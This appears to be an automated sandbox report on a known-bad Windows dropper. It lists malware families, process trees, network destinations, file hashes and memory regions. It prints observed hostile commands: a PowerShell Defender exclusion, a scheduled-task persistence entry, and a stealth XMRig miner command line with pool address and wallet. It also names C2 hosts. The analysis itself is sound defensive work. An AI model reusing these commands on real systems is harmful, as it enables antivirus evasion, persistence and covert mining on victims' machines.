Analysis Overview
SHA256
f7f5898bbed2b677a52a031071110b8aebb4b3eba2669703f6dd60e6953dc2a2
Threat Level: Known bad
The file 2737e2cab1e399c563fe0557683234fd was found to be: Known bad.
Malicious Activity Summary
Vidar
RedLine payload
RedLine
RisePro
xmrig
SectopRAT
SectopRAT payload
PrivateLoader
NullMixer
SmokeLoader
Vidar Stealer
XMRig Miner payload
Loads dropped DLL
ASPack v2.12-2.42
Executes dropped EXE
Looks up external IP address via web service
Adds Run key to start application
Legitimate hosting services abused for malware hosting/C2
Program crash
Enumerates physical storage devices
Unsigned PE
Creates scheduled task(s)
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-12-31 03:59
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2023-12-31 03:59
Reported
2024-01-02 03:57
Platform
win7-20231215-en
Max time kernel
5s
Max time network
170s
Command Line
Signatures
NullMixer
PrivateLoader
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
RisePro
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
SmokeLoader
Vidar
xmrig
Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\setup_install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\0c879100232.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\f35fb6370e5673.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\cfbebc6111c611.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\23cfc2c69e2b5.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\227af833e4e9ad4.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\45523e3cdecd50c9.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\52748077bb26.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\dc8baab07.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\cc8d5bf9d8.exe | N/A |
| N/A | N/A | C:\Windows\system32\DllHost.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\23cfc2c69e2b5.exe | N/A |
Loads dropped DLL
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\cfbebc6111c611.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | api.db-ip.com | N/A | N/A |
| N/A | api.db-ip.com | N/A | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\setup_install.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\227af833e4e9ad4.exe |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\2737e2cab1e399c563fe0557683234fd.exe
"C:\Users\Admin\AppData\Local\Temp\2737e2cab1e399c563fe0557683234fd.exe"
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c cfbebc6111c611.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 23cfc2c69e2b5.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 45523e3cdecd50c9.exe
C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\45523e3cdecd50c9.exe
45523e3cdecd50c9.exe
C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\23cfc2c69e2b5.exe
"C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\23cfc2c69e2b5.exe" -a
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\cc8d5bf9d8.exe
cc8d5bf9d8.exe
C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\52748077bb26.exe
52748077bb26.exe
C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\dc8baab07.exe
dc8baab07.exe
C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\227af833e4e9ad4.exe
227af833e4e9ad4.exe
C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\23cfc2c69e2b5.exe
23cfc2c69e2b5.exe
C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\cfbebc6111c611.exe
cfbebc6111c611.exe
C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\f35fb6370e5673.exe
f35fb6370e5673.exe
C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\0c879100232.exe
0c879100232.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c cc8d5bf9d8.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 52748077bb26.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c dc8baab07.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c f35fb6370e5673.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2960 -s 428
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 227af833e4e9ad4.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 0c879100232.exe
C:\Users\Admin\AppData\Local\Temp\chrome2.exe
"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"
C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
C:\Windows\winnetdriv.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe" 1704167716 0
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1824 -s 972
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
C:\Users\Admin\AppData\Roaming\services64.exe
"C:\Users\Admin\AppData\Roaming\services64.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\Local\Temp\7zS61DF.tmp\Install.cmd" "
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2844 CREDAT:275457 /prefetch:2
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.org/16B4c7
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}
C:\Windows\explorer.exe
C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.main/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6BJ+edII5Fll530cZ/+msGEWovb73nU3RrOnuNmRoFcg" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | marisana.xyz | udp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | db-ip.com | udp |
| US | 104.26.5.15:443 | db-ip.com | tcp |
| US | 8.8.8.8:53 | lenak513.tumblr.com | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 74.114.154.22:443 | lenak513.tumblr.com | tcp |
| US | 8.8.8.8:53 | music-sec.xyz | udp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | api.db-ip.com | udp |
| US | 172.67.75.166:443 | api.db-ip.com | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 8.8.8.8:53 | www.maxmind.com | udp |
| US | 104.18.145.235:80 | www.maxmind.com | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| NL | 37.0.8.235:80 | tcp | |
| US | 8.8.8.8:53 | www.wpdsfds23x.com | udp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 172.67.132.113:443 | iplogger.org | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| GB | 96.17.179.184:80 | apps.identrust.com | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 172.67.132.113:443 | iplogger.org | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| NL | 37.0.11.8:80 | tcp | |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 8.8.8.8:53 | aucmoney.com | udp |
| US | 8.8.8.8:53 | thegymmum.com | udp |
| US | 8.8.8.8:53 | atvcampingtrips.com | udp |
| US | 8.8.8.8:53 | kuapakualaman.com | udp |
| US | 8.8.8.8:53 | renatazarazua.com | udp |
| US | 8.8.8.8:53 | nasufmutlu.com | udp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 172.67.132.113:443 | iplogger.org | tcp |
| US | 172.67.132.113:443 | iplogger.org | tcp |
| LV | 45.142.213.135:30058 | tcp | |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 8.8.8.8:53 | x2.c.lencr.org | udp |
| GB | 173.222.13.40:80 | x2.c.lencr.org | tcp |
| US | 8.8.8.8:53 | x2.c.lencr.org | udp |
| GB | 173.222.13.40:80 | x2.c.lencr.org | tcp |
| US | 8.8.8.8:53 | wfsdragon.ru | udp |
| US | 172.67.133.215:80 | wfsdragon.ru | tcp |
| GB | 173.222.13.40:80 | x2.c.lencr.org | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| NL | 212.193.30.115:80 | tcp | |
| LV | 45.142.213.135:30058 | tcp | |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 8.8.8.8:53 | sanctam.net | udp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| LV | 45.142.213.135:30058 | tcp | |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| DE | 140.82.121.4:443 | github.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.110.133:443 | raw.githubusercontent.com | tcp |
| N/A | 127.0.0.1:49278 | tcp | |
| N/A | 127.0.0.1:49281 | tcp | |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| NL | 212.193.30.115:80 | tcp | |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| LV | 45.142.213.135:30058 | tcp | |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 8.8.8.8:53 | xmr-eu2.nanopool.org | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.68.143:443 | pastebin.com | tcp |
| NL | 212.193.30.115:80 | tcp | |
| US | 8.8.8.8:53 | xmr-eu1.nanopool.org | udp |
| FR | 141.94.23.83:14433 | xmr-eu1.nanopool.org | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| LV | 45.142.213.135:30058 | tcp | |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| LV | 45.142.213.135:30058 | tcp | |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| LV | 45.142.213.135:30058 | tcp | |
| NL | 212.193.30.115:80 | tcp | |
| US | 3.20.137.44:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| LV | 45.142.213.135:30058 | tcp | |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| US | 3.141.96.53:443 | live.goatgame.live | tcp |
| LV | 45.142.213.135:30058 | tcp |
Files
\Users\Admin\AppData\Local\Temp\setup_installer.exe
| MD5 | 05cd842f936d714465cb73287b0ef83d |
| SHA1 | b39bee28bc4c42bd086a8ba1c8fd5560a26ca881 |
| SHA256 | ee6b821ec26751ccb3e14e3ebc7aae737298d63a18ac2b27f6a295ef108b8372 |
| SHA512 | 789868c466a6a7165f8de5d8982c21549b5a801a356666c89680865b692f9b1ee7826b29fa56ea73096fb20ec687440d64be6cdc587947351d12353c7bb8e2b7 |
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
| MD5 | b15d3c878a51f11190d6886cb3ab8b73 |
| SHA1 | 5775318b9b4a44eec3fbca27a2b8d165e2ab0308 |
| SHA256 | 8c2fe5a4625e7dc1928d5ade9053d6ad655fb1d47beead8e5642493fc7f44beb |
| SHA512 | 8937ac421269338abe25b3ed8797ff40e827ee5c69c3d8e9e5f40e2b7813b6cf5d7b126fa974e2e50f393efe24381e20b4d7cb83a668b7c046e6f180e5995f9a |
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
| MD5 | f3978f536f40d2d434c1d85e7f5e330b |
| SHA1 | fbaed8394314bcfb835f6e7bc7dbbacf225db80a |
| SHA256 | 78be629934adc57181021d05c175ef7fbe6e3849fb97fb8fc5e3cbee1144afad |
| SHA512 | 0cd65d47e12ee1697407aee1046a5a1724ef3accf60b78706efd2569244108b6163adc2f0c287ac5707aa96edf939737a9facffa5041b6befebb15ccc79a95ad |
\Users\Admin\AppData\Local\Temp\setup_installer.exe
| MD5 | da7ba1e73dbcaa51469180211a111663 |
| SHA1 | 3c300c8c95c7c881b7914ff9f1eeb4bdd3bae03f |
| SHA256 | 0cdff899355957cc2eab72a9cfebb49b7759c9d6099a1f657aafbde0c528f26d |
| SHA512 | 74ed715e7afc8d326d475198b5876fa28103545a4b1dcea858d4bc7ecd99ca0e99aab8c14fe5cac386ed13f632f3376c33839508227e20a75e3eefa9c6d9af85 |
\Users\Admin\AppData\Local\Temp\setup_installer.exe
| MD5 | 5af64b02529038aa5e766dcff4ece466 |
| SHA1 | b5dd26e65e0191bb38bc58a3686a23003a41c2d8 |
| SHA256 | 618024b4c0c8d3ca9924b8536804b83760e2e1140d8e400bf972e8ac79c7facb |
| SHA512 | a2186d277238c43fe781dd273400bba2cd31f7a7dd24d5d8b6bd74b5e76eeacc18b54434952362a2b195351937c4303b7c01eefb0d79da8482cc6cda434c3107 |
\Users\Admin\AppData\Local\Temp\setup_installer.exe
| MD5 | 0a7f5ccfee694282b3c0ffecf42fb5b2 |
| SHA1 | 693ccc5ed5712d143f334e009c2fdc30eb67112d |
| SHA256 | a3bd0a2d0ac227c60f68311863463c86ed23279dde0685152ec8581ba5a27f2a |
| SHA512 | 233a94eb25bb81bca975c5bfa0d236a967d8ab3ef7dec18dcb5a31437946c5715f59f927a2d646636acca1faa372b86dcb725c976b2ecaa9cadf605be1dd3d72 |
memory/2960-51-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2960-52-0x0000000064940000-0x0000000064959000-memory.dmp
memory/2960-54-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2960-57-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2960-55-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2960-60-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2960-63-0x000000006B280000-0x000000006B2A6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\23cfc2c69e2b5.exe
| MD5 | 3263859df4866bf393d46f06f331a08f |
| SHA1 | 5b4665de13c9727a502f4d11afb800b075929d6c |
| SHA256 | 9dcacda3913e30cafd92c909648b5bffde14b8e39e6adbfb15628006c0d4d3c2 |
| SHA512 | 58205110a017f5d73dd131fefb1e3bbbcc670ed0c645aeefebe5281579c7b1dceffa56671cd7b186554bdb81710e21018ed0d7088a27517dfc5e48d6d3578cf6 |
C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\cfbebc6111c611.exe
| MD5 | 7e06ee9bf79e2861433d6d2b8ff4694d |
| SHA1 | 28de30147de38f968958e91770e69ceb33e35eb5 |
| SHA256 | e254914f5f7feb6bf10041e2c705d469bc2b292d709dc944381db5911beb1d9f |
| SHA512 | 225cd5e37dbc29aad1d242582748457112b0adb626541a6876c2c6a0e6a27d986791654fd94458e557c628dc16db17f22db037853fae7c41dde34ba4e7245081 |
\Users\Admin\AppData\Local\Temp\7zSC58F2F96\dc8baab07.exe
| MD5 | 5866ab1fae31526ed81bfbdf95220190 |
| SHA1 | 75a5e08b3b9ad2dff35dfbbb3ffe8d983c2be25f |
| SHA256 | 9e1a149370efe9814bf2cbd87acfcfa410d1769efd86a9722da4373d6716d22e |
| SHA512 | 8d99ab09e84e4ef309da34be94946cbfcffeb1c0ca49e2452deb738d801e551062ebb134f1b99a9baf03003a8e720d525521ce09aeac341d3cba3fcfbc618fb5 |
\Users\Admin\AppData\Local\Temp\7zSC58F2F96\cc8d5bf9d8.exe
| MD5 | 13a289feeb15827860a55bbc5e5d498f |
| SHA1 | e1f0a544fcc5b3bc0ab6a788343185ad1ad077ad |
| SHA256 | c5483b2acbb352dc5c9a811d9616c4519f0e07c13905552be5ec869613ada775 |
| SHA512 | 00c225fb1d88920c5df7bb853d32213a91254fb8c57169c58c8b0ffab4501486e24d87e3d8f5665b16e366362cb81deec535d833ed42434fdc31f0400ee7ffa7 |
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
| MD5 | ef5fa848e94c287b76178579cf9b4ad0 |
| SHA1 | 560215a7c4c3f1095f0a9fb24e2df52d50de0237 |
| SHA256 | 949eec48613bd1ce5dd05631602e1e1571fa9d6b0034ab1bffe313e923aff29c |
| SHA512 | 7d4184aa762f3db66cf36955f20374bf55f4c5dbe60130deaeade392296a4124867c141f1d5e7fbf60b640ef09cce8fb04b76b7dd20cbac2ce4033f9882a1071 |
\Users\Admin\AppData\Local\Temp\7zSC58F2F96\52748077bb26.exe
| MD5 | 22272aaee3f0ff421c0a2d5abeed26c9 |
| SHA1 | f7f6b229e4da0139102fbb49015aa894b99829e3 |
| SHA256 | dcfe57e3b65ddfb62112935f3dd640379828a83533bea0e7badd3a3870f0fc34 |
| SHA512 | f351105b7aed518ac8ab80d61fe5baf8ba37b4c689e560e4ad147a6c21c4dcf98e47816e65aa47cab87dcd9115bb2b071b71344a569979ee1413bccd84122207 |
C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\45523e3cdecd50c9.exe
| MD5 | 181f1849ccb484af2eebb90894706150 |
| SHA1 | 45dee946a7abc9c1c05d158a05e768e06a0d2cdc |
| SHA256 | aeb2d203b415b00e0a23aa026862cec8e11962fdb99c6dce38fb0b018b7d8409 |
| SHA512 | a87485005ca80e145a7b734735184fa2d374a7f02e591eec9e51b77dc2a51be7f8198ce5abfceb9546c48bf235a555f19d6c57469975d0b4c786b0db16df930c |
\Users\Admin\AppData\Local\Temp\7zSC58F2F96\f35fb6370e5673.exe
| MD5 | 0965da18bfbf19bafb1c414882e19081 |
| SHA1 | e4556bac206f74d3a3d3f637e594507c30707240 |
| SHA256 | 1cdddf182f161ab789edfcc68a0706d0b8412a9ba67a3f918fe60fab270eabff |
| SHA512 | fe4702a2fde36b4fb0015ad7d3e2169a1ccbf5e29d7edef40f104ed47661b4b0365b13b1913e9f4e0ab7bc9ac542ee86c02a802a13567dfd0b8f5485a5be829b |
\Users\Admin\AppData\Local\Temp\7zSC58F2F96\227af833e4e9ad4.exe
| MD5 | dea4fe16fc93c5de689cad2450123f27 |
| SHA1 | b1358b24f4f0769b7dd09c4db1633e38829bf756 |
| SHA256 | 39e0d892a41c3488275e7e048838d1f9dc9602435f7a8d1f5fdbc54973c5a5fd |
| SHA512 | f0e688558bbbb357c0afdb6f85a6a6898b7ce4e35fa13e3b55df5229e22035b66558d8795adafb99ea860e1789afedfd563743ba4f264b924ac844fc59eac506 |
memory/1912-135-0x0000000000010000-0x0000000000018000-memory.dmp
memory/1576-134-0x0000000000AA0000-0x0000000000ACE000-memory.dmp
memory/2308-137-0x0000000001370000-0x00000000014B2000-memory.dmp
memory/1476-136-0x0000000000160000-0x000000000024E000-memory.dmp
memory/1912-138-0x000007FEF5E10000-0x000007FEF67FC000-memory.dmp
memory/1576-141-0x00000000002C0000-0x00000000002C6000-memory.dmp
memory/2648-140-0x00000000001D0000-0x00000000001D9000-memory.dmp
memory/2648-139-0x00000000002E0000-0x00000000003E0000-memory.dmp
memory/2960-62-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2960-58-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2960-59-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/1576-142-0x00000000002D0000-0x00000000002F2000-memory.dmp
memory/1576-145-0x00000000002F0000-0x00000000002F6000-memory.dmp
memory/1824-147-0x0000000000360000-0x00000000003FD000-memory.dmp
memory/1824-146-0x0000000003470000-0x0000000003570000-memory.dmp
memory/2648-144-0x0000000000400000-0x00000000032F8000-memory.dmp
memory/2960-50-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/1528-159-0x000000013F110000-0x000000013F120000-memory.dmp
memory/1824-161-0x0000000000400000-0x000000000334B000-memory.dmp
memory/1528-162-0x000007FEF5E10000-0x000007FEF67FC000-memory.dmp
memory/1576-163-0x000007FEF5E10000-0x000007FEF67FC000-memory.dmp
memory/1912-164-0x000000001AFD0000-0x000000001B050000-memory.dmp
memory/2960-42-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2960-39-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/1576-165-0x000000001AF70000-0x000000001AFF0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\CabA21B.tmp
| MD5 | ac05d27423a85adc1622c714f2cb6184 |
| SHA1 | b0fe2b1abddb97837ea0195be70ab2ff14d43198 |
| SHA256 | c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d |
| SHA512 | 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d |
C:\Users\Admin\AppData\Local\Temp\TarA25C.tmp
| MD5 | 9c0c641c06238516f27941aa1166d427 |
| SHA1 | 64cd549fb8cf014fcd9312aa7a5b023847b6c977 |
| SHA256 | 4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f |
| SHA512 | 936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06 |
memory/2476-194-0x0000000001F10000-0x0000000001FF4000-memory.dmp
C:\Windows\winnetdriv.exe
| MD5 | f128ef15f55d03f02604a88319ef64f1 |
| SHA1 | 772aeeecda5e78f8709633210d8aa684d9baa900 |
| SHA256 | d07159093a1afa2287ef8bc0013ddaf8a66d946f1d532c8e0a4fbbd36df531cb |
| SHA512 | db74527d3b0fd799f41023effe2ed53dcb1d914707c6fd0bd82bed18961dc2fa5c9e2f7a26d21345eb1b01a1fe93102d5f69e615e58dd4375f0103fbe5c530f3 |
memory/3024-212-0x0000000000190000-0x0000000000274000-memory.dmp
memory/2308-236-0x0000000000340000-0x0000000000352000-memory.dmp
memory/1204-249-0x0000000002A40000-0x0000000002A56000-memory.dmp
memory/2648-250-0x0000000000400000-0x00000000032F8000-memory.dmp
memory/2960-254-0x0000000064940000-0x0000000064959000-memory.dmp
memory/2960-258-0x000000006FE40000-0x000000006FFC6000-memory.dmp
memory/2960-257-0x000000006EB40000-0x000000006EB63000-memory.dmp
memory/2960-256-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/2960-255-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/2960-253-0x0000000000400000-0x0000000000A11000-memory.dmp
memory/1824-262-0x0000000000400000-0x000000000334B000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 8cf2a36d61baad3ea3a5ee49ea118e86 |
| SHA1 | a089a5f7096cda35bdc91e5ac499c330364802ff |
